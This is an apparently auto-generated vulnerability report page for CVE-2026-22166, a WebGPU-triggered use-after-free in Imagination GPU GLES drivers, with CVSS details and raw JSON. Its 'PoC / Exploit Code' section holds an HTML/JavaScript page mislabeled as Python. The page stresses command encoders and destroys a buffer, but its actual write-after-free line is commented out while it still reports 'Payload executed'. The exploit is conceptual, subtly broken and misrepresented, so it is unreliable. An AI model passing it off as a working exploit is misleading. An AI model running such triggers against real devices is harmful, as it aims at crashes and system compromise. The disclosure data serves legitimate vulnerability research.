Security Vulnerability Report
中文
CVE-2026-22166 CVSS 8.1 HIGH

CVE-2026-22166

Published: 2026-05-01 16:16:30
Last Modified: 2026-05-06 19:05:56
Source: 367425dc-4d06-4041-9650-c2dc6aaa27ce

Description

A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable subsequent exploit on the system.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Imagination GPU Drivers (Specific versions undisclosed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC Concept for CVE-2026-22166 This PoC attempts to trigger the UAF in the GPU GLES process via WebGPU. Note: Actual exploitation depends on specific GPU hardware and driver version. --> <html> <head> <title>CVE-2026-22166 PoC</title> </head> <body> <h1>Testing WebGPU UAF</h1> <script> async function triggerUAF() { if (!navigator.gpu) { console.log("WebGPU not supported"); return; } const adapter = await navigator.gpu.requestAdapter(); const device = await adapter.requestDevice(); // Create a buffer to manipulate memory const bufferSize = 1024; const buffer = device.createBuffer({ size: bufferSize, usage: GPUBufferUsage.COPY_DST | GPUBufferUsage.STORAGE, }); // Simulate unusual WebGPU content sequence that might trigger UAF // by rapidly mapping/unmapping or encoding complex command sequences // that stress the GLES user-space library. for (let i = 0; i < 1000; i++) { const encoder = device.createCommandEncoder(); // Abnormal usage pattern const pass = encoder.beginRenderPass({ colorAttachments: [] }); pass.end(); device.queue.submit([encoder.finish()]); // Force potential race condition or stale pointer access buffer.destroy(); // Attempt to write after destroy (conceptual trigger) // device.queue.writeBuffer(buffer, 0, new Uint8Array(1024)); } console.log("Payload executed"); } triggerUAF(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22166", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-05-01T16:16:29.563", "lastModified": "2026-05-06T19:05:56.337", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger write UAF crash in the GPU GLES user-space shared library. On certain platforms, when the process executing graphics workload has system privileges this could enable subsequent exploit on the system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.